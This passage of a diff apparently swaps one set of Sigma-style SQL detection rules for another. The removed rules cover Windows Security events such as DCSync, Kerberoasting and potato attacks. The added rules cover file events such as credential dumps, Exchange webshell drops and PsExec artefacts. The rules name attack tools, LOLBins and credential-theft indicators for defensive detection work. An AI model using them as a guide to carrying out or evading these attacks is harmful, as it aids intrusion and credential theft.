"file_event_win_tsclient_filewrite_startup.yml" }, { - "title": "Operation Wocao Activity - Security", - "id": "74ad4314-482e-4c3e-b237-3f7ed3b9ca8d", - "status": "test", - "description": "Detects activity mentioned in Operation Wocao report", - "author": "Florian Roth (Nextron Systems), frack113", + "title": "Created Files by Office Applications", + "id": "c7a74c80-ba5a-486e-9974-ab9e682bc5e4", + "status": "experimental", + "description": "This rule will monitor executable and script file creation by office applications. Please add more file extensions or magic bytes to the logic of your choice.", + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", "tags": [ - "attack.discovery", - "attack.t1012", - "attack.defense_evasion", - "attack.t1036.004", - "attack.t1027", - "attack.execution", - "attack.t1053.005", - "attack.t1059.001" + "attack.t1204.002", + "attack.execution" ], "falsepositives": [ - "Administrators that use checkadmin.exe tool to enumerate local administrators" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4799' AND TargetUserName LIKE 'Administr%' ESCAPE '\\' AND CallerProcessName LIKE '%\\\\checkadmin.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.ocx' ESCAPE '\\' OR TargetFilename LIKE '%.com' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.proj' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\WebServiceCache\\\\AllUsers%' ESCAPE '\\' AND TargetFilename LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\webexdelta\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\assembly\\\\tmp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')))" ], - "filename": "win_security_apt_wocao.yml" + "filename": "file_event_win_script_creation_by_office_using_file_ext.yml" }, { - "title": "Suspicious Scheduled Task Update", - "id": "614cf376-6651-47c4-9dcc-6b9527f749f4", + "title": "Office Macro File Creation From Suspicious Process", + "id": "b1c50487-1967-4315-a026-6491686d860e", "status": "experimental", - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a office macro file from a a suspicious process", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4702' AND (TaskContentNew LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR TaskContentNew LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\') AND (TaskContentNew LIKE '%regsvr32%' ESCAPE '\\' OR TaskContentNew LIKE '%rundll32%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%cmd%' ESCAPE '\\' OR TaskContentNew LIKE '%/c %' ESCAPE '\\' OR TaskContentNew LIKE '%/k %' ESCAPE '\\' OR TaskContentNew LIKE '%/r %' ESCAPE '\\' OR TaskContentNew LIKE '%powershell%' ESCAPE '\\' OR TaskContentNew LIKE '%pwsh%' ESCAPE '\\' OR TaskContentNew LIKE '%mshta%' ESCAPE '\\' OR TaskContentNew LIKE '%wscript%' ESCAPE '\\' OR TaskContentNew LIKE '%cscript%' ESCAPE '\\' OR TaskContentNew LIKE '%certutil%' ESCAPE '\\' OR TaskContentNew LIKE '%bitsadmin%' ESCAPE '\\' OR TaskContentNew LIKE '%bash.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%bash %' ESCAPE '\\' OR TaskContentNew LIKE '%scrcons%' ESCAPE '\\' OR TaskContentNew LIKE '%wmic %' ESCAPE '\\' OR TaskContentNew LIKE '%wmic.exe%' ESCAPE '\\' OR TaskContentNew LIKE '%forfiles%' ESCAPE '\\' OR TaskContentNew LIKE '%scriptrunner%' ESCAPE '\\' OR TaskContentNew LIKE '%hh.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) AND (TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.potm' ESCAPE '\\' OR TargetFilename LIKE '%.pptm' ESCAPE '\\'))" ], - "filename": "win_security_susp_scheduled_task_update.yml" + "filename": "file_event_win_office_macro_files_from_susp_process.yml" }, { - "title": "KrbRelayUp Attack Pattern", - "id": "749c9f5e-b353-4b90-a9c1-05243357ca4b", + "title": "Suspicious DotNET CLR Usage Log Artifact", + "id": "e0b06658-7d1d-4cd3-bf15-03467507ff7c", "status": "experimental", - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects the creation of Usage Log files by the CLR (clr.dll). These files are named after the executing process once the assembly is finished executing for the first time in the (user) session context.", + "author": "frack113, omkar72, oscd.community, Wojciech Lesicki", "tags": [ - "attack.privilege_escalation", - "attack.credential_access" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Rundll32.exe with zzzzInvokeManagedCustomActionOutOfProc in command line and msiexec.exe as parent process - https://twitter.com/SBousseaden/status/1388064061087260675" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND AuthenticationPackageName = 'Kerberos' AND IpAddress = '127.0.0.1' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND TargetUserSid LIKE '%-500' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%\\\\UsageLogs\\\\cmstp.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\cscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\mshta.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\msxsl.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\regsvr32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\rundll32.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\svchost.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wscript.exe.log' ESCAPE '\\' OR TargetFilename LIKE '%\\\\UsageLogs\\\\wmic.exe.log' ESCAPE '\\') AND NOT ((ParentProcessName LIKE '%\\\\MsiExec.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% -Embedding%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%Temp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\')))" ], - "filename": "win_security_susp_krbrelayup.yml" + "filename": "file_event_win_net_cli_artefact.yml" }, { - "title": "RottenPotato Like Attack Pattern", - "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", + "title": "QuarksPwDump Dump File", + "id": "847def9e-924d-4e90-b7c4-5f581395a2b4", "status": "test", - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "author": "@SBousseaden, Florian Roth", + "description": "Detects a dump file written by QuarksPwDump password dumper", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.privilege_escalation", "attack.credential_access", - "attack.t1557.001" + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM-%' ESCAPE '\\' AND TargetFilename LIKE '%.dmp%' ESCAPE '\\')" ], - "filename": "win_security_susp_rottenpotato.yml" + "filename": "file_event_win_hktl_quarkspw_filedump.yml" }, { - "title": "Windows Defender Exclusion Set", - "id": "e9c8808f-4cfb-4ba9-97d4-e5f3beaa244d", + "title": "CVE-2021-26858 Exchange Exploitation", + "id": "b06335b3-55ac-4b41-937e-16b7f5d57dfd", "status": "test", - "description": "Detects scenarios where an windows defender exclusion was added in registry where an entity would want to bypass antivirus scanning from windows defender", - "author": "@BarryShooshooga", + "description": "Detects possible successful exploitation for vulnerability described in CVE-2021-26858 by looking for \ncreation of non-standard files on disk by Exchange Server’s Unified Messaging service\nwhich could indicate dropping web shells or other malicious content\n", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.t1203", + "attack.execution", + "cve.2021.26858" ], "falsepositives": [ - "Intended inclusions by administrator" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4657', '4656', '4660', '4663') AND ObjectName LIKE '%\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%UMWorkerProcess.exe' ESCAPE '\\' AND NOT ((TargetFilename LIKE '%CacheCleanup.bin' ESCAPE '\\' OR TargetFilename LIKE '%.txt' ESCAPE '\\' OR TargetFilename LIKE '%.LOG' ESCAPE '\\' OR TargetFilename LIKE '%.cfg' ESCAPE '\\' OR TargetFilename LIKE '%cleanup.bin' ESCAPE '\\')))" ], - "filename": "win_security_defender_bypass.yml" + "filename": "file_event_win_cve_2021_26858_msexchange.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - Security", - "id": "4edf51e1-cb83-4e1a-bc39-800e396068e3", + "title": "PSEXEC Remote Execution File Artefact", + "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", + "attack.lateral_movement", + "attack.privilege_escalation", "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1136.002", + "attack.t1543.003", + "attack.t1570", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%&&%' ESCAPE '\\' AND ServiceFileName LIKE '%clipboard]::%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" ], - "filename": "win_security_invoke_obfuscation_clip_services_security.yml" + "filename": "file_event_win_psexec_service_key.yml" }, { - "title": "Mimikatz DC Sync", - "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", - "status": "experimental", - "description": "Detects Mimikatz DC sync security events", - "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", + "title": "GoToAssist Temporary Installation Artefact", + "id": "5d756aee-ad3e-4306-ad95-cb1abec48de2", + "status": "test", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.s0002", - "attack.t1003.006" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Valid DC Sync that is not covered by the filters; please report", - "Local Domain Admin account used for Azure AD Connect" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes All%' ESCAPE '\\' OR Properties LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR Properties LIKE '%9923a32a-3607-11d2-b9be-0000f87a36b2%' ESCAPE '\\' OR Properties LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\') AND AccessMask = '0x100') AND NOT ((SubjectDomainName = 'Window Manager') OR ((SubjectUserName LIKE 'NT AUT%' ESCAPE '\\' OR SubjectUserName LIKE 'MSOL\\_%' ESCAPE '\\')) OR (SubjectUserName LIKE '%$' ESCAPE '\\')))" + "SELECT * FROM logs WHERE TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\LogMeInInc\\\\GoToAssist Remote Support Expert\\\\%' ESCAPE '\\'" ], - "filename": "win_security_dcsync.yml" + "filename": "file_event_win_gotoopener_artefact.yml" }, { - "title": "Weak Encryption Enabled and Kerberoast", - "id": "f6de9536-0441-4b3f-a646-f4e00f300ffd", - "status": "test", - "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", - "author": "@neu5ron", + "title": "Suspicious ASPX File Drop by Exchange", + "id": "bd1212e5-78da-431e-95fa-c58e3237a8e6", + "status": "experimental", + "description": "Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder", + "author": "Florian Roth (Nextron Systems), MSTI (query, idea)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1505.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4738' AND ((((NewUacValue LIKE '%8___' ESCAPE '\\' OR NewUacValue LIKE '%9___' ESCAPE '\\' OR NewUacValue LIKE '%A___' ESCAPE '\\' OR NewUacValue LIKE '%B___' ESCAPE '\\' OR NewUacValue LIKE '%C___' ESCAPE '\\' OR NewUacValue LIKE '%D___' ESCAPE '\\' OR NewUacValue LIKE '%E___' ESCAPE '\\' OR NewUacValue LIKE '%F___' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8___' ESCAPE '\\' OR OldUacValue LIKE '%9___' ESCAPE '\\' OR OldUacValue LIKE '%A___' ESCAPE '\\' OR OldUacValue LIKE '%B___' ESCAPE '\\' OR OldUacValue LIKE '%C___' ESCAPE '\\' OR OldUacValue LIKE '%D___' ESCAPE '\\' OR OldUacValue LIKE '%E___' ESCAPE '\\' OR OldUacValue LIKE '%F___' ESCAPE '\\'))) OR ((NewUacValue LIKE '%1____' ESCAPE '\\' OR NewUacValue LIKE '%3____' ESCAPE '\\' OR NewUacValue LIKE '%5____' ESCAPE '\\' OR NewUacValue LIKE '%7____' ESCAPE '\\' OR NewUacValue LIKE '%9____' ESCAPE '\\' OR NewUacValue LIKE '%B____' ESCAPE '\\' OR NewUacValue LIKE '%D____' ESCAPE '\\' OR NewUacValue LIKE '%F____' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%1____' ESCAPE '\\' OR OldUacValue LIKE '%3____' ESCAPE '\\' OR OldUacValue LIKE '%5____' ESCAPE '\\' OR OldUacValue LIKE '%7____' ESCAPE '\\' OR OldUacValue LIKE '%9____' ESCAPE '\\' OR OldUacValue LIKE '%B____' ESCAPE '\\' OR OldUacValue LIKE '%D____' ESCAPE '\\' OR OldUacValue LIKE '%F____' ESCAPE '\\')))) OR ((NewUacValue LIKE '%8__' ESCAPE '\\' OR NewUacValue LIKE '%9__' ESCAPE '\\' OR NewUacValue LIKE '%A__' ESCAPE '\\' OR NewUacValue LIKE '%B__' ESCAPE '\\' OR NewUacValue LIKE '%C__' ESCAPE '\\' OR NewUacValue LIKE '%D__' ESCAPE '\\' OR NewUacValue LIKE '%E__' ESCAPE '\\' OR NewUacValue LIKE '%F__' ESCAPE '\\') AND NOT ((OldUacValue LIKE '%8__' ESCAPE '\\' OR OldUacValue LIKE '%9__' ESCAPE '\\' OR OldUacValue LIKE '%A__' ESCAPE '\\' OR OldUacValue LIKE '%B__' ESCAPE '\\' OR OldUacValue LIKE '%C__' ESCAPE '\\' OR OldUacValue LIKE '%D__' ESCAPE '\\' OR OldUacValue LIKE '%E__' ESCAPE '\\' OR OldUacValue LIKE '%F__' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' AND CommandLine LIKE '%MSExchange%' ESCAPE '\\' AND (TargetFilename LIKE '%FrontEnd\\\\HttpProxy\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\inetpub\\\\wwwroot\\\\aspnet\\_client\\\\%' ESCAPE '\\') AND (TargetFilename LIKE '%.aspx' ESCAPE '\\' OR TargetFilename LIKE '%.asp' ESCAPE '\\' OR TargetFilename LIKE '%.ashx' ESCAPE '\\'))" ], - "filename": "win_security_alert_enable_weak_encryption.yml" + "filename": "file_event_win_exchange_webshell_drop.yml" }, { - "title": "Denied Access To Remote Desktop", - "id": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "status": "test", - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "author": "Pushkarev Dmitry", + "title": "Suspicious File Creation In Uncommon AppData Folder", + "id": "d7b50671-d1ad-4871-aa60-5aa5b331fe04", + "status": "experimental", + "description": "Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Romaing, LocalLow). This method could be used as a method to bypass detection who exclude the AppData folder in fear of FPs", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Valid user was not added to RDP group" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\' OR TargetFilename LIKE '%.cpl' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.iso' ESCAPE '\\' OR TargetFilename LIKE '%.lnk' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.psm1' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\')) AND NOT (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\LocalLow\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_not_allowed_rdp_access.yml" + "filename": "file_event_win_new_files_in_uncommon_appdata_folder.yml" }, { - "title": "CVE-2023-23397 Exploitation Attempt", - "id": "73c59189-6a6d-4b9f-a748-8f6f9bbed75c", + "title": "Suspicious Executable File Creation", + "id": "74babdd6-a758-4549-9632-26535279e654", "status": "experimental", - "description": "Detects outlook initiating connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation.", - "author": "Robert Lee @quantum_cookie", + "description": "Detect creation of suspicious executable file name. Some strings look for suspicious file extensions, others look for filenames that exploit unquoted service paths.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.initial_access", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "Searchprotocolhost.exe likes to query these registry keys. To avoid false postives, it's better to filter out those events before they reach the SIEM" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND ObjectName LIKE '%\\\\REGISTRY\\\\MACHINE\\\\SYSTEM%' ESCAPE '\\' AND ObjectName LIKE '%Services\\\\%' ESCAPE '\\' AND (ObjectName LIKE '%WebClient\\\\NetworkProvider' ESCAPE '\\' OR ObjectName LIKE '%LanmanWorkstation\\\\NetworkProvider' ESCAPE '\\') AND AccessList LIKE '%\\%\\%4416%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((TargetFilename LIKE '%.bat.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys.exe' ESCAPE '\\') OR (TargetFilename LIKE 'C:\\\\$Recycle.Bin.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Documents and Settings.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\MSOCache.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\Recovery.exe' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\PerfLogs.exe' ESCAPE '\\'))" ], - "filename": "win_security_exploit_cve_2023_23397_outlook_remote_file_query.yml" + "filename": "file_event_win_susp_executable_creation.yml" }, { - "title": "DPAPI Domain Master Key Backup Attempt", - "id": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", + "title": "UAC Bypass Using MSConfig Token Modification - File", + "id": "41bb431f-56d8-4691-bb56-ed34e390906f", "status": "test", - "description": "Detects anyone attempting a backup for the DPAPI Master Key. This events gets generated at the source and not the Domain Controller.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data. Which will trigger this event." + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4692')" + "SELECT * FROM logs WHERE (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\pkgmgr.exe' ESCAPE '\\')" ], - "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml" + "filename": "file_event_win_uac_bypass_msconfig_gui.yml" }, { - "title": "Active Directory User Backdoors", - "id": "300bac00-e041-4ee2-9c36-e262656a6ecc", - "status": "test", - "description": "Detects scenarios where one can control another users or computers account without having to use their credentials.", - "author": "@neu5ron", + "title": "Wmiexec Default Output File", + "id": "8d5aca11-22b3-4f22-b7ba-90e60533e1fb", + "status": "experimental", + "description": "Detects the creation of the default output filename used by the wmiexec tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1098", - "attack.persistence" + "attack.lateral_movement", + "attack.t1047" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4738' AND NOT (AllowedToDelegateTo = '-' OR AllowedToDelegateTo = '')) OR ((EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToDelegateTo') OR (EventID = '5136' AND ObjectClass = 'user' AND AttributeLDAPDisplayName = 'servicePrincipalName') OR (EventID = '5136' AND AttributeLDAPDisplayName = 'msDS-AllowedToActOnBehalfOfOtherIdentity'))))" + "SELECT * FROM logs WHERE (TargetFilename REGEXP '\\\\Windows\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'C:\\\\__1\\d{9}\\.\\d{1,7}$' OR TargetFilename REGEXP 'D:\\\\__1\\d{9}\\.\\d{1,7}$')" ], - "filename": "win_security_alert_ad_user_backdoors.yml" + "filename": "file_event_win_wmiexec_default_filename.yml" }, { - "title": "SCM Database Handle Failure", - "id": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "status": "experimental", - "description": "Detects non-system users failing to get a handle of the SCM database.", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "New Shim Database Created in the Default Directory", + "id": "ee63c85c-6d51-4d12-ad09-04e25877a947", + "status": "test", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1010" + "attack.persistence", + "attack.t1547.009" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4656' AND ObjectType LIKE 'SC\\_MANAGER OBJECT' ESCAPE '\\' AND ObjectName = 'ServicesActive' AND AccessMask = '0xf003f') AND NOT (SubjectLogonId = '0x3e4'))" + "SELECT * FROM logs WHERE (TargetFilename LIKE '%.sdb' ESCAPE '\\' AND TargetFilename LIKE '%\\\\Windows\\\\apppatch\\\\Custom\\\\%' ESCAPE '\\')" ], - "filename": "win_security_scm_database_handle_failure.yml" + "filename": "file_event_win_creation_new_shim_database.yml" }, { - "title": "Powerview Add-DomainObjectAcl DCSync AD Extend Right", - "id": "2c99737c-585d-4431-b61a-c911d86ff32f", + "title": "Suspicious Creation with Colorcpl", + "id": "e15b518d-b4ce-4410-a9cd-501f23ce4a18", "status": "experimental", - "description": "Backdooring domain object to grant the rights associated with DCSync to a regular user or machine account using Powerview\\Add-DomainObjectAcl DCSync Extended Right cmdlet, will allow to re-obtain the pwd hashes of any user/computer", - "author": "Samir Bousseaden; Roberto Rodriguez @Cyb3rWard0g; oscd.community; Tim Shelton; Maxence Fossat", + "description": "Once executed, colorcpl.exe will copy the arbitrary file to c:\\windows\\system32\\spool\\drivers\\color\\", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1564" ], "falsepositives": [ - "New Domain Controller computer account, check user SIDs within the value attribute of event 5136 and verify if it's a regular user or DC computer account." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5136' AND AttributeLDAPDisplayName = 'ntSecurityDescriptor' AND (AttributeValue LIKE '%1131f6ad-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%1131f6aa-9c07-11d1-f79f-00c04fc2dcd2%' ESCAPE '\\' OR AttributeValue LIKE '%89e95b76-444d-4c62-991a-0facbeda640c%' ESCAPE '\\')) AND NOT ((ObjectClass IN ('dnsNode', 'dnsZoneScope', 'dnsZone'))))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\colorcpl.exe' ESCAPE '\\' AND NOT (((TargetFilename LIKE '%.icm' ESCAPE '\\' OR TargetFilename LIKE 